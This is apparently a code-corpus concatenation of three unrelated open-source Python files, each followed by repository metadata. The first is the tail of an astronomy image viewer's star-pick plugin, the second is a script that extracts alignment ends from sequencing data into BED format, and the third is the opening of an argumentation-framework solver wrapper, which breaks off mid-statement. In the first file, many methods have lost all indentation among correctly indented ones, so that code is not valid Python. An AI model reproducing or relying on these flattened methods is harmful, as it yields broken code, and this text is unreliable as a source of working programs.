        """Recompute the pick: cut out the region and launch evaluation.

        Invalidates any evaluation already in flight (serial number bump
        plus interrupt event), cuts the rectangle from the main image
        into the pick viewer, then offloads the peak search to a worker
        thread via search().
        """
        serialnum = self.bump_serial()
        self.ev_intr.set()
        fig = self.canvas.getObjectByTag(self.picktag)
        if fig.kind != 'compound':
            return True
        bbox = fig.objects[0]
        point = fig.objects[1]
        text = fig.objects[2]
        data_x, data_y = point.x, point.y
        #self.fitsimage.panset_xy(data_x, data_y, redraw=False)
        # set the pick image to have the same cut levels and transforms
        self.fitsimage.copy_attributes(self.pickimage,
                                       ['transforms', 'cutlevels',
                                        'rgbmap'],
                                       redraw=False)
        try:
            image = self.fitsimage.get_image()
            # sanity check on region
            width = bbox.x2 - bbox.x1
            height = bbox.y2 - bbox.y1
            if (width > self.max_side) or (height > self.max_side):
                errmsg = "Image area (%dx%d) too large!" % (
                    width, height)
                self.fv.show_error(errmsg)
                raise Exception(errmsg)
            # Cut and show pick image in pick window
            #self.pick_x, self.pick_y = data_x, data_y
            self.logger.debug("bbox %f,%f %f,%f" % (bbox.x1, bbox.y1,
                                                    bbox.x2, bbox.y2))
            x1, y1, x2, y2, data = self.cutdetail(self.fitsimage,
                                                  self.pickimage,
                                                  int(bbox.x1), int(bbox.y1),
                                                  int(bbox.x2), int(bbox.y2))
            self.logger.debug("cut box %f,%f %f,%f" % (x1, y1, x2, y2))
            # calculate center of pick image
            wd, ht = self.pickimage.get_data_size()
            xc = wd // 2
            yc = ht // 2
            if not self.pickcenter:
                # first pick: create the center marker lazily
                tag = self.pickimage.add(self.dc.Point(xc, yc, 5,
                                                       linewidth=1,
                                                       color='red'))
                self.pickcenter = self.pickimage.getObjectByTag(tag)
            self.pick_x1, self.pick_y1 = x1, y1
            self.pick_data = data
            self.wdetail.sample_area.set_text('%dx%d' % (x2-x1, y2-y1))
            # red = "calculation in progress"
            point.color = 'red'
            text.text = 'Pick: calc'
            self.pickcenter.x = xc
            self.pickcenter.y = yc
            self.pickcenter.color = 'red'
            # clear contour and fwhm plots
            if self.have_mpl:
                self.clear_contours()
                self.clear_fwhm()
            # Delete previous peak marks
            objs = self.fitsimage.getObjectsByTagpfx('peak')
            self.fitsimage.deleteObjects(objs, redraw=True)
            # Offload this task to another thread so that GUI remains
            # responsive
            self.fv.nongui_do(self.search, serialnum, data,
                              x1, y1, wd, ht, fig)
        except Exception as e:
            self.logger.error("Error calculating quality metrics: %s" % (
                str(e)))
        return True
    def search(self, serialnum, data, x1, y1, wd, ht, fig):
        """Worker-thread peak search and evaluation over cutout *data*.

        Stale runs are dropped by comparing *serialnum* against the
        current serial; results (or an error message) are handed back to
        the GUI thread via update_pick().
        """
        if serialnum != self.get_serial():
            return
        with self.lock2:
            self.pgs_cnt = 0
            self.ev_intr.clear()
            # init_progress must run synchronously on the GUI thread
            self.fv.gui_call(self.init_progress)
            msg, results, qs = None, None, None
            try:
                self.update_status("Finding bright peaks...")
                # Find bright peaks in the cutout
                peaks = self.iqcalc.find_bright_peaks(data,
                                                      threshold=self.threshold,
                                                      radius=self.radius)
                num_peaks = len(peaks)
                if num_peaks == 0:
                    raise Exception("Cannot find bright peaks")
                def cb_fn(obj):
                    # per-peak progress callback
                    self.pgs_cnt += 1
                    pct = float(self.pgs_cnt) / num_peaks
                    self.fv.gui_do(self.update_progress, pct)
                # Evaluate those peaks
                self.update_status("Evaluating %d bright peaks..." % (
                    num_peaks))
                objlist = self.iqcalc.evaluate_peaks(peaks, data,
                                                     fwhm_radius=self.radius,
                                                     cb_fn=cb_fn,
                                                     ev_intr=self.ev_intr)
                num_candidates = len(objlist)
                if num_candidates == 0:
                    raise Exception("Error evaluating bright peaks: no candidates found")
                self.update_status("Selecting from %d candidates..." % (
                    num_candidates))
                height, width = data.shape
                results = self.iqcalc.objlist_select(objlist, width, height,
                                                     minfwhm=self.min_fwhm,
                                                     maxfwhm=self.max_fwhm,
                                                     minelipse=self.min_ellipse,
                                                     edgew=self.edgew)
                if len(results) == 0:
                    raise Exception("No object matches selection criteria")
                qs = results[0]
            except Exception as e:
                msg = str(e)
                self.update_status(msg)
            if serialnum == self.get_serial():
                self.fv.gui_do(self.update_pick, serialnum, results, qs,
                               x1, y1, wd, ht, fig, msg)
def _make_report_header(self):
return self.rpt_header + '\n'
    def _make_report(self, image, qs):
        """Build a Bunch of report values for pick result *qs* on *image*.

        Sky coordinates and star size fall back to safe defaults when
        the WCS or pixel scale cannot be determined; any other failure
        is logged and an (incomplete) Bunch is returned.
        """
        d = Bunch.Bunch()
        try:
            x, y = qs.objx, qs.objy
            equinox = float(image.get_keyword('EQUINOX', 2000.0))
            try:
                ra_deg, dec_deg = image.pixtoradec(x, y, coords='data')
                ra_txt, dec_txt = wcs.deg2fmt(ra_deg, dec_deg, 'str')
            except Exception as e:
                self.logger.warn("Couldn't calculate sky coordinates: %s" % (str(e)))
                ra_deg, dec_deg = 0.0, 0.0
                ra_txt = dec_txt = 'BAD WCS'
            # Calculate star size from pixel pitch
            try:
                header = image.get_header()
                ((xrot, yrot),
                 (cdelt1, cdelt2)) = wcs.get_xy_rotation_and_scale(header)
                starsize = self.iqcalc.starsize(qs.fwhm_x, cdelt1,
                                                qs.fwhm_y, cdelt2)
            except Exception as e:
                self.logger.warn("Couldn't calculate star size: %s" % (str(e)))
                starsize = 0.0
            # shift to the user's 0- or 1-based coordinate convention
            rpt_x = x + self.pixel_coords_offset
            rpt_y = y + self.pixel_coords_offset
            # make a report in the form of a dictionary
            d.setvals(x = rpt_x, y = rpt_y,
                      ra_deg = ra_deg, dec_deg = dec_deg,
                      ra_txt = ra_txt, dec_txt = dec_txt,
                      equinox = equinox,
                      fwhm = qs.fwhm,
                      fwhm_x = qs.fwhm_x, fwhm_y = qs.fwhm_y,
                      ellipse = qs.elipse, background = qs.background,
                      skylevel = qs.skylevel, brightness = qs.brightness,
                      starsize = starsize,
                      time_local = time.strftime("%Y-%m-%d %H:%M:%S",
                                                 time.localtime()),
                      time_ut = time.strftime("%Y-%m-%d %H:%M:%S",
                                              time.gmtime()),
                      )
        except Exception as e:
            self.logger.error("Error making report: %s" % (str(e)))
        return d
    def update_pick(self, serialnum, objlist, qs, x1, y1, wd, ht, fig, msg):
        """GUI-thread callback: display the result of a pick evaluation.

        *serialnum* guards against stale results; *objlist* holds the
        candidate objects, *qs* the selected object (in cutout
        coordinates), (*x1*, *y1*) the cutout origin, (*wd*, *ht*) the
        cutout size, *fig* the compound canvas marker and *msg* an error
        message (None on success).  Always returns True.
        """
        if serialnum != self.get_serial():
            # a newer pick superseded this result--drop it silently
            return
        try:
            image = self.fitsimage.get_image()
            point = fig.objects[1]
            text = fig.objects[2]
            text.text = "Pick"
            if msg is not None:
                # evaluation failed upstream; route through error branch
                raise Exception(msg)
            # Mark new peaks, if desired
            if self.show_candidates:
                for obj in objlist:
                    tag = self.fitsimage.add(self.dc.Point(x1+obj.objx,
                                                           y1+obj.objy,
                                                           5,
                                                           linewidth=1,
                                                           color=self.candidate_color),
                                             tagpfx='peak', redraw=False)
            # Add back in offsets into image to get correct values with respect
            # to the entire image
            qs.x += x1
            qs.y += y1
            qs.objx += x1
            qs.objy += y1
            # Calculate X/Y of center of star
            obj_x = qs.objx
            obj_y = qs.objy
            fwhm = qs.fwhm
            fwhm_x, fwhm_y = qs.fwhm_x, qs.fwhm_y
            point.x, point.y = obj_x, obj_y
            text.color = 'cyan'
            # Make report
            self.last_rpt = self._make_report(image, qs)
            d = self.last_rpt
            if self.do_record:
                self.add_pick_cb()
            # update the detail readout widgets
            self.wdetail.fwhm_x.set_text('%.3f' % fwhm_x)
            self.wdetail.fwhm_y.set_text('%.3f' % fwhm_y)
            self.wdetail.fwhm.set_text('%.3f' % fwhm)
            self.wdetail.object_x.set_text('%.3f' % (d.x))
            self.wdetail.object_y.set_text('%.3f' % (d.y))
            self.wdetail.sky_level.set_text('%.3f' % qs.skylevel)
            self.wdetail.background.set_text('%.3f' % qs.background)
            self.wdetail.brightness.set_text('%.3f' % qs.brightness)
            self.wdetail.ra.set_text(d.ra_txt)
            self.wdetail.dec.set_text(d.dec_txt)
            self.wdetail.equinox.set_text(str(d.equinox))
            self.wdetail.star_size.set_text('%.3f' % d.starsize)
            self.w.btn_sky_cut.set_enabled(True)
            self.w.btn_bright_cut.set_enabled(True)
            # Mark center of object on pick image
            i1 = point.x - x1
            j1 = point.y - y1
            self.pickcenter.x = i1
            self.pickcenter.y = j1
            self.pickcenter.color = 'cyan'
            self.pick_qs = qs
            self.pickimage.panset_xy(i1, j1, redraw=True)
            # Mark object center on image
            point.color = 'cyan'
            #self.fitsimage.panset_xy(obj_x, obj_y, redraw=False)
            self.update_status("Done")
            self.plot_panx = float(i1) / wd
            self.plot_pany = float(j1) / ht
            if self.have_mpl:
                self.plot_contours()
                self.plot_fwhm(qs)
        except Exception as e:
            errmsg = "Error calculating quality metrics: %s" % (
                str(e))
            self.logger.error(errmsg)
            self.fv.show_error(errmsg, raisetab=False)
            #self.update_status("Error")
            # blank the readouts so stale numbers are not shown
            for key in ('sky_level', 'background', 'brightness',
                        'star_size', 'fwhm_x', 'fwhm_y'):
                self.wdetail[key].set_text('')
            self.wdetail.fwhm.set_text('Failed')
            self.w.btn_sky_cut.set_enabled(False)
            self.w.btn_bright_cut.set_enabled(False)
            self.pick_qs = None
            text.color = 'red'
            self.plot_panx = self.plot_pany = 0.5
            #self.plot_contours()
            # TODO: could calc background based on numpy calc
        self.w.btn_intr_eval.set_enabled(False)
        self.pickimage.redraw(whence=3)
        self.canvas.redraw(whence=3)
        self.fv.showStatus("Click left mouse button to reposition pick")
        return True
def eval_intr(self):
self.ev_intr.set()
    def btndown(self, canvas, event, data_x, data_y):
        """Button-press callback: start a new pick region centered on
        the cursor, reusing the half-extent of the current region.
        """
        try:
            obj = self.canvas.getObjectByTag(self.picktag)
            if obj.kind == 'rectangle':
                bbox = obj
            else:
                bbox = obj.objects[0]
                point = obj.objects[1]
            # remember the half extents of the existing region
            self.dx = (bbox.x2 - bbox.x1) // 2
            self.dy = (bbox.y2 - bbox.y1) // 2
        except Exception as e:
            # no existing region--fall back to the previous dx/dy
            pass
        dx = self.dx
        dy = self.dy
        # Mark center of object and region on main image
        try:
            self.canvas.deleteObjectByTag(self.picktag, redraw=False)
        except:
            pass
        x1, y1 = data_x - dx, data_y - dy
        x2, y2 = data_x + dx, data_y + dy
        tag = self.canvas.add(self.dc.Rectangle(x1, y1, x2, y2,
                                                color='cyan',
                                                linestyle='dash'))
        self.picktag = tag
        #self.draw_cb(self.canvas, tag)
        return True
    def update(self, canvas, event, data_x, data_y):
        """Pointer-update callback: recenter the pick region on the
        cursor and re-run the pick via draw_cb().

        A compound "calculated" marker is replaced by a plain dashed
        rectangle; a bare rectangle is moved in place.
        """
        try:
            obj = self.canvas.getObjectByTag(self.picktag)
            if obj.kind == 'rectangle':
                bbox = obj
            else:
                bbox = obj.objects[0]
                point = obj.objects[1]
            # remember the half extents of the existing region
            self.dx = (bbox.x2 - bbox.x1) // 2
            self.dy = (bbox.y2 - bbox.y1) // 2
        except Exception as e:
            obj = None
            pass
        dx = self.dx
        dy = self.dy
        x1, y1 = data_x - dx, data_y - dy
        x2, y2 = data_x + dx, data_y + dy
        if (not obj) or (obj.kind == 'compound'):
            # Replace compound image with rectangle
            try:
                self.canvas.deleteObjectByTag(self.picktag, redraw=False)
            except:
                pass
            tag = self.canvas.add(self.dc.Rectangle(x1, y1, x2, y2,
                                                    color='cyan',
                                                    linestyle='dash'),
                                  redraw=False)
        else:
            # Update current rectangle with new coords
            bbox.x1, bbox.y1, bbox.x2, bbox.y2 = x1, y1, x2, y2
            tag = self.picktag
        self.draw_cb(self.canvas, tag)
        return True
    def drag(self, canvas, event, data_x, data_y):
        """Drag callback: translate the pick region so its center
        follows the cursor, without recalculating the pick.
        """
        obj = self.canvas.getObjectByTag(self.picktag)
        if obj.kind == 'compound':
            bbox = obj.objects[0]
        elif obj.kind == 'rectangle':
            bbox = obj
        else:
            # unexpected object type--nothing sensible to drag
            return True
        # calculate center of bbox
        wd = bbox.x2 - bbox.x1
        dw = wd // 2
        ht = bbox.y2 - bbox.y1
        dh = ht // 2
        x, y = bbox.x1 + dw, bbox.y1 + dh
        # calculate offsets of move
        dx = (data_x - x)
        dy = (data_y - y)
        # calculate new coords
        x1, y1, x2, y2 = bbox.x1+dx, bbox.y1+dy, bbox.x2+dx, bbox.y2+dy
        if (not obj) or (obj.kind == 'compound'):
            # Replace compound image with rectangle
            try:
                self.canvas.deleteObjectByTag(self.picktag, redraw=False)
            except:
                pass
            self.picktag = self.canvas.add(self.dc.Rectangle(x1, y1, x2, y2,
                                                             color='cyan',
                                                             linestyle='dash'))
        else:
            # Update current rectangle with new coords and redraw
            bbox.x1, bbox.y1, bbox.x2, bbox.y2 = x1, y1, x2, y2
            self.canvas.redraw(whence=3)
        return True
    def draw_cb(self, canvas, tag):
        """Draw-complete callback: replace a user-drawn rectangle by the
        compound pick marker (rectangle + center point + label) and kick
        off a new pick calculation via redo().
        """
        obj = canvas.getObjectByTag(tag)
        if obj.kind != 'rectangle':
            return True
        canvas.deleteObjectByTag(tag, redraw=False)
        if self.picktag:
            # drop any previous pick marker
            try:
                canvas.deleteObjectByTag(self.picktag, redraw=False)
            except:
                pass
        # determine center of rectangle
        x1, y1, x2, y2 = obj.get_llur()
        x = x1 + (x2 - x1) // 2
        y = y1 + (y2 - y1) // 2
        tag = canvas.add(self.dc.CompoundObject(
            self.dc.Rectangle(x1, y1, x2, y2,
                              color=self.pickcolor),
            self.dc.Point(x, y, 10, color='red'),
            self.dc.Text(x1, y2+4, "Pick: calc",
                         color=self.pickcolor)),
                         redraw=False)
        self.picktag = tag
        #self.fv.raise_tab("detail")
        return self.redo()
    def edit_cb(self, canvas, obj):
        """Edit callback: after the pick rectangle has been moved or
        resized in the editor, reposition the center point and label to
        match, then re-run the pick calculation.
        """
        if obj.kind != 'rectangle':
            return True
        # Get the compound object that sits on the canvas.
        # Make sure edited rectangle was our pick rectangle.
        c_obj = self.canvas.getObjectByTag(self.picktag)
        if (c_obj.kind != 'compound') or (len(c_obj.objects) < 3) or \
               (c_obj.objects[0] != obj):
            return False
        # determine center of rectangle
        x1, y1, x2, y2 = obj.get_llur()
        x = x1 + (x2 - x1) // 2
        y = y1 + (y2 - y1) // 2
        # reposition other elements to match
        point = c_obj.objects[1]
        point.x, point.y = x, y
        text = c_obj.objects[2]
        text.x, text.y = x1, y2 + 4
        return self.redo()
    def reset_region(self):
        """Reset the pick region to its default width/height, keeping
        the current center, then re-run the pick calculation.
        """
        self.dx = region_default_width
        self.dy = region_default_height
        obj = self.canvas.getObjectByTag(self.picktag)
        if obj.kind != 'compound':
            return True
        bbox = obj.objects[0]
        # calculate center of bbox
        wd = bbox.x2 - bbox.x1
        dw = wd // 2
        ht = bbox.y2 - bbox.y1
        dh = ht // 2
        x, y = bbox.x1 + dw, bbox.y1 + dh
        # calculate new coords (default-sized box around the old center)
        bbox.x1, bbox.y1, bbox.x2, bbox.y2 = (x-self.dx, y-self.dy,
                                              x+self.dx, y+self.dy)
        self.redo()
def pan_to_pick_cb(self):
if not self.pick_qs:
self.fv.showStatus("Please pick an object to set the sky level!")
return
pan_x, pan_y = self.pick_qs.objx, self.pick_qs.objy
# TODO: convert to WCS coords based on user preference
self.fitsimage.set_pan(pan_x, pan_y, coord='data')
return True
def sky_cut(self):
if not self.pick_qs:
self.fv.showStatus("Please pick an object to set the sky level!")
return
loval = self.pick_qs.skylevel
oldlo, hival = self.fitsimage.get_cut_levels()
try:
loval += self.delta_sky
self.fitsimage.cut_levels(loval, hival)
except Exception as e:
self.fv.showStatus("No valid sky level: '%s'" % (loval))
def bright_cut(self):
if not self.pick_qs:
self.fv.showStatus("Please pick an object to set the brightness!")
return
skyval = self.pick_qs.skylevel
hival = self.pick_qs.brightness
loval, oldhi = self.fitsimage.get_cut_levels()
try:
# brightness is measured ABOVE sky level
hival = skyval + hival + self.delta_bright
self.fitsimage.cut_levels(loval, hival)
except Exception as e:
self.fv.showStatus("No valid brightness level: '%s'" % (hival))
def zoomset(self, setting, zoomlevel, fitsimage):
scalefactor = fitsimage.get_scale()
self.logger.debug("scalefactor = %.2f" % (scalefactor))
text = self.fv.scale2text(scalefactor)
self.wdetail.zoom.set_text(text)
def detailxy(self, canvas, button, data_x, data_y):
"""Motion event in the pick fits window. Show the pointing
information under the cursor.
"""
if button == 0:
# TODO: we could track the focus changes to make this check
# more efficient
fitsimage = self.fv.getfocus_fitsimage()
# Don't update global information if our fitsimage isn't focused
if fitsimage != self.fitsimage:
return True
# Add offsets from cutout
data_x = data_x + self.pick_x1
data_y = data_y + self.pick_y1
return self.fv.showxy(self.fitsimage, data_x, data_y)
def cutdetail(self, srcimage, dstimage, x1, y1, x2, y2, redraw=True):
image = srcimage.get_image()
data, x1, y1, x2, y2 = image.cutout_adjust(x1, y1, x2, y2)
dstimage.set_data(data, redraw=redraw)
return (x1, y1, x2, y2, data)
def pan_plot(self, xdelta, ydelta):
x1, x2 = self.w.ax.get_xlim()
y1, y2 = self.w.ax.get_ylim()
self.w.ax.set_xlim(x1+xdelta, x2+xdelta)
self.w.ax.set_ylim(y1+ydelta, y2+ydelta)
self.w.canvas.draw()
def write_pick_log(self, rpt):
if self.pick_log is not None:
self.pick_log.write(rpt)
self.pick_log.flush()
def add_pick_cb(self):
if self.last_rpt is not None:
rpt = (self.rpt_format % self.last_rpt) + '\n'
self.w.report.append_text(rpt)
## if self.pick_log:
## self.fv.nongui_do(self.write_pick_log, rpt)
self.write_pick_log(rpt)
def correct_wcs(self):
# small local function to strip comment and blank lines
def _flt(line):
line = line.strip()
if line.startswith('#'):
return False
if len(line) == 0:
return False
return True
# extract image and reference coords from text widgets
txt1 = self.w.report.get_text()
lines1 = filter(_flt, txt1.split('\n'))
txt2 = self.w.correct.get_text()
lines2 = filter(_flt, txt2.split('\n'))
assert len(lines1) == len(lines2), \
Exception("Number of lines don't match in reports")
img_coords = list(map(lambda l: map(float, l.split(',')[3:5]), lines1))
ref_coords = list(map(lambda l: map(float, l.split(',')[0:2]), lines2))
image = self.fitsimage.get_image()
self.fv.nongui_do(self._calc_match, image, img_coords, ref_coords)
def _calc_match(self, image, img_coords, ref_coords):
# NOTE: this function is run in a non-gui thread!
try:
wcs_m, tup = image.match_wcs(img_coords, ref_coords)
self.fv.gui_do(self.adjust_wcs, image, wcs_m, tup)
except Exception as e:
errmsg = "Error calculating WCS match: %s" % (str(e))
self.fv.gui_do(self.fv.show_error, errmsg)
return
def __str__(self):
return 'pick'
#END
|
sosey/ginga
|
ginga/misc/plugins/Pick.py
|
Python
|
bsd-3-clause
| 54,653
|
[
"Gaussian"
] |
f9a896a489d7fad7c0ff232d7deef33a8583296148cb97097168a079dbc3bdce
|
#!/usr/bin/env python
import argparse
import logging
from sys import stdout
from shutil import rmtree
from tempfile import mkdtemp
from pybedtools import BedTool
import pysam
# avoid ugly python IOError when stdout output is piped into another program
# and then truncated (such as piping to head)
from signal import signal, SIGPIPE, SIG_DFL
# restore default SIGPIPE disposition: die quietly instead of raising
signal(SIGPIPE, SIG_DFL)
# help text shown by argparse (--help); doubles as the module description
tool_description = """
Extract alignment ends from sam file and export to bed format.
The resulting bed file contains the outer coordinates of the alignments. The bed
name field is set to the read id and the score field is set to the edit distance
of the alignment. The crosslinked nucleotide is one nt upstream of the 5'-end of
the bed entries.
This script only reports results for alignments that are properly aligned in FR
("forward-reverse") direction.
By default output is written to stdout.
Input:
* alignments in SAM or BAM format (paired-end sequencing)
Output:
* bed6 file containing outer coordinates (sorted by read id)
Example usage:
- Extract coordinates from file input.bam and write to file output.bed
extract_aln_ends.py input.bam --out output.bed
"""
class DefaultsRawDescriptionHelpFormatter(argparse.ArgumentDefaultsHelpFormatter,
                                          argparse.RawDescriptionHelpFormatter):
    """Argparse help formatter that keeps the description's raw layout
    while also appending default values to argument help strings."""
    # To join the behaviour of RawDescriptionHelpFormatter with that of ArgumentDefaultsHelpFormatter
    pass
# parse command line arguments
# (kept at module level: this script is meant to be run, not imported)
parser = argparse.ArgumentParser(description=tool_description,
                                 formatter_class=DefaultsRawDescriptionHelpFormatter)
# positional arguments
parser.add_argument(
    "infile",
    help="Path to alignments in SAM or BAM format.")
# optional arguments
parser.add_argument(
    "-o", "--outfile",
    help="Write results to this file.")
# misc arguments
parser.add_argument(
    "-v", "--verbose",
    help="Be verbose.",
    action="store_true")
parser.add_argument(
    "-d", "--debug",
    help="Print lots of debugging information",
    action="store_true")
args = parser.parse_args()
# pick log level and format from the command-line verbosity flags
if args.debug:
    log_kwargs = dict(
        level=logging.DEBUG,
        format="%(asctime)s - %(filename)s - %(levelname)s - %(message)s")
elif args.verbose:
    log_kwargs = dict(
        level=logging.INFO,
        format="%(filename)s - %(levelname)s - %(message)s")
else:
    log_kwargs = dict(format="%(filename)s - %(levelname)s - %(message)s")
logging.basicConfig(**log_kwargs)

# echo the parsed arguments at INFO level
logging.info("Parsed arguments:")
logging.info("  infile: '{}'".format(args.infile))
if args.outfile:
    logging.info("  outfile: enabled writing to file")
    logging.info("  outfile: '{}'".format(args.outfile))
logging.info("")
# convert to bam for use with pybedtools
try:
    # setup temporary directory for intermediate bam files
    tmpdir = mkdtemp()
    logging.debug("tmpdir: " + tmpdir)
    fn_sorted = tmpdir + "/sorted.bam"
    fn_fixedmates = tmpdir + "/fixedmates.bam"

    # sort by id
    logging.debug("calling samtools sort")
    pysam.sort(args.infile, "-n", "-o{}".format(fn_sorted), "-T{}".format(tmpdir))

    # fix mate information
    # also removes secondary and unmapped reads
    logging.debug("calling samtools fixmates")
    pysam.fixmate("-r", fn_sorted, fn_fixedmates)

    # bedtools bam2bed
    alns = BedTool(fn_fixedmates)
    alns_bedpe = alns.bam_to_bed(bedpe=True, mate1=True, ed=True)

    # determine alignment ends and write to file
    # BUGFIX: do not wrap stdout in a 'with' block--that would close
    # sys.stdout when the block exits and break later output/logging
    out = open(args.outfile, "w") if args.outfile is not None else stdout
    try:
        for i in alns_bedpe:
            chrom = i.fields[0]
            fmstart = i.fields[1]
            fmend = i.fields[2]
            smstart = i.fields[4]
            smend = i.fields[5]
            readid = i.fields[6]
            score = i.fields[7]
            fmstrand = i.fields[8]
            # outer coordinates: first-mate start to second-mate end on
            # the plus strand, and vice versa on the minus strand
            if fmstrand == "+":
                start = fmstart
                end = smend
            elif fmstrand == "-":
                start = smstart
                end = fmend
            else:
                logging.warning("Skipping {}, strand information is missing: '{}'".format(readid, i))
                continue
            out.write("\t".join([chrom, start, end, readid, score, fmstrand]) + "\n")
    finally:
        # only close real files; stdout must stay open
        if out is not stdout:
            out.close()
finally:
    # clean up intermediate files (log after the removal succeeded)
    rmtree(tmpdir)
    logging.debug("removed tmpdir: " + tmpdir)
|
dmaticzka/bctools
|
bin/extract_aln_ends.py
|
Python
|
apache-2.0
| 4,215
|
[
"pysam"
] |
1ba23d90eb436032bcb8a9d2aeaf076520e3bab87266b8d2bbb87015d7fcd76a
|
#!/usr/bin/env python
################################################################################
##
## Copyright 2013, 2014 Stefan Ellmauthaler, ellmauthaler@informatik.uni-leipzig.de
## Joerg Puehrer, puehrer@informatik.uni-leipzig.de
## Hannes Strass, strass@informatik.uni-leipzig.de
##
## This file is part of diamond.
##
## diamond is free software: you can redistribute it and/or modify
## it under the terms of the GNU General Public License as published by
## the Free Software Foundation, either version 3 of the License, or
## (at your option) any later version.
##
## diamond is distributed in the hope that it will be useful,
## but WITHOUT ANY WARRANTY; without even the implied warranty of
## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
## GNU General Public License for more details.
##
## You should have received a copy of the GNU General Public License
## along with diamond. If not, see <http://www.gnu.org/licenses/>.
##
################################################################################
##
## diamond.py
##
import argparse
import configparser as cp
import os
import tempfile
import time
import sys
import subprocess as sp
import lib.tools.formulatree as ft
#import lib.adf2dadf.adf2dadf_adm as adf2dadf_adm
import lib.tools.utils as util
import lib.tools.claspresult as cr
version='2.0.2'
# default variables (overridable via the config file, see initvars())
encdir = "lib"
installdir = os.path.dirname(os.path.realpath(__file__))
eclipse = "eclipse"
clingo = "clingo"
python = "python"
transform = "asp"
# file extensions of instances that signify something
dung_af_file_extension = ".af"
bipolar_file_extension = ".badf"
formula_file_extension = ".adf"
# verbosity level used by dia_print(); adjusted from -v in main()
verb_level = 1
# credulous/sceptical acceptance arguments, set from the command line
args_cred = []
args_scep = []
# encoding filenames (resolved to absolute paths in main())
enc = dict(
    tkk = "3KK.lp",
    ac2cico = "ac2cico.lp",
    adm = "admissible.lp",
    afop = "afop.lp",
    base = "base.lp",
    bipc = "bipcheck.lp",
    bop = "bop.lp",
    cf = "cf.lp",
    cfi = "cfi.lp",
    cmp = "complete.lp",
    fmodel = "fmodel.lp",
    formulatree = os.path.join('tools','formulatree.lp'),
    grd = "grounded.lp",
    imax = "imax.lp",
    ltype = "linktypes.lp",
    model = "model.lp",
    naiD = "naiD.lp",
    op = "op.lp",
    opsm = "opsm.lp",
    prf = "preferred.lp",
    prfD = "prfD.lp",
    pref = "pref.lp",
    prefpy = "pref.py",
    prio_trans = "prio_trans.lp",
    repr_change = "repr_change.lp",
    rmax = "rmax.lp",
    semD = "semD.lp",
    show = "show.lp",
    show_iccma = "show_iccma.lp",
    stb = "stable.lp",
    stgD = "stgD.lp",
    tb2badf = "theorybase2badf.lp",
    transformpl = "transform.pl",
    transformpy = "transform.py",
    twovalued = "twovalued.lp")
# temporary files to delete on exit
filesToDelete=[]
def getoptval(config, section, option, default):
    """Return config[section][option] if present, else *default*.

    Thin wrapper around ConfigParser.get() that tolerates a missing
    section or option instead of raising.
    """
    # ConfigParser.get() supports this directly: 'fallback' is returned
    # when the section or the option does not exist (same semantics as
    # the original has_option() check, including DEFAULT-section values)
    return config.get(section, option, fallback=default)
def initvars(cfgfile):
    """Load tool paths and preferences from *cfgfile*.

    If the config file exists, the module-level configuration globals
    are updated from it; otherwise a new config file is written,
    populated with the current defaults.
    """
    global installdir, eclipse, clingo, python, transform
    # expand ~ and environment variables in the config file path
    cfgfile = os.path.expandvars(os.path.expanduser(cfgfile))
    config = cp.ConfigParser()
    if os.path.exists(cfgfile):
        config.read_file(open(cfgfile))
        installdir = getoptval(config,"Path","installdir",installdir)
        eclipse = getoptval(config,"Path","eclipse",eclipse)
        clingo = getoptval(config,"Path","clingo",clingo)
        python = getoptval(config,"Path","python",python)
        transform = getoptval(config,"Preferences","transform",transform)
    else: #config file does not exist - create one
        config.add_section("Path")
        config.set("Path","installdir",installdir)
        config.set("Path","eclipse", eclipse)
        config.set("Path","clingo", clingo)
        config.set("Path","python", python)
        config.add_section("Preferences")
        config.set("Preferences","transform", transform)
        config.write(open(cfgfile,'w'))
# simple printing function honouring the chosen verbosity level
def dia_print(text, verb=1):
    """Print *text* only when the global verbosity is at least *verb*."""
    if verb_level >= verb:
        print(text)
def onestepsolvercall(encodings,instance,headline,allmodels=True):
    """Run clingo once over *encodings* + *instance* and report results.

    Implements credulous (-cred) and sceptical (-scep) acceptance
    checks by adding an integrity constraint from a temporary file;
    formats output ICCMA-style when the global iccma flag is set.  When
    *allmodels* is False, the '0' (enumerate-all) clingo option is
    suppressed for this call only.
    """
    global clingo_options,clstdout,clstderr,args_cred,args_scep,filesToDelete,iccma
    dia_print("==============================")
    dia_print(headline)
    decision=True
    if args_cred!=None:
        dia_print("Checking credulous acceptance of: "+args_cred[0],2)
        dia_print("Argument is credulously accepted iff answer is SATISFIABLE",2)
        # strip surrounding double quotes from the argument name, if any
        if args_cred[0].startswith('"') and args_cred[0].endswith('"'):
            args_cred[0] = (args_cred[0])[1:-1]
        # constraint: reject interpretations where the argument is NOT true
        tmp_file_content=":- not t("+args_cred[0]+").\n"
        tmp_file = tempfile.NamedTemporaryFile(mode='w+t', encoding='utf-8', delete=False)
        tmp_file.write(tmp_file_content)
        tmp_file.flush()
        constraints=[tmp_file.name]
        filesToDelete.append(tmp_file.name)
        switchbool=False
    elif args_scep!=None:
        dia_print("Checking sceptical acceptance of: "+args_scep[0],2)
        dia_print("Argument is sceptically accepted iff answer is UNSATISFIABLE",2)
        if args_scep[0].startswith('"') and args_scep[0].endswith('"'):
            args_scep[0] = (args_scep[0])[1:-1]
        # constraint: reject interpretations where the argument IS true
        tmp_file_content=":- t("+args_scep[0]+").\n"
        tmp_file = tempfile.NamedTemporaryFile(mode='w+t', encoding='utf-8', delete=False)
        tmp_file.write(tmp_file_content)
        tmp_file.flush()
        constraints = [tmp_file.name]
        filesToDelete.append(tmp_file.name)
        switchbool=True
    elif (args_scep==None and args_cred==None):
        # plain enumeration: no acceptance constraint
        constraints = []
        decision = False
    sys.stdout.flush()
    if not allmodels and '0' in clingo_options:
        clingo_options.remove('0')
    #clingo_options= ['0']
    #clstderr=None
    #clstderr=sp.DEVNULL
    if iccma:
        # capture clingo's JSON output and reformat it ICCMA-style
        with sp.Popen([clingo]+encodings+[enc['show']]+[instance]+constraints+clingo_options,stderr=clstderr,stdout=clstdout,shell=False) as p:
            outstring = p.communicate()[0].decode('UTF-8')
        res = cr.ClaspResult(outstring)
        if (not decision) and (not res.sat):
            dia_print('NO',0)
        elif decision:
            if res.sat!=switchbool: # a very bad hack to invert the answer of the ASP solver only in some cases (i.e. sceptical reasoning)
                dia_print('YES',0)
            else:
                dia_print('NO',0)
        else:
            if '0' in clingo_options:
                dia_print(res.getEnumICCMAoutput(),0)
            else:
                dia_print(res.getOneICCMAoutput(),0)
    else:
        # non-ICCMA mode: let clingo write directly to our stdout/stderr
        with sp.Popen([clingo]+encodings+[enc['show']]+[instance]+constraints+clingo_options,stderr=clstderr,stdout=clstdout,shell=False) as p:
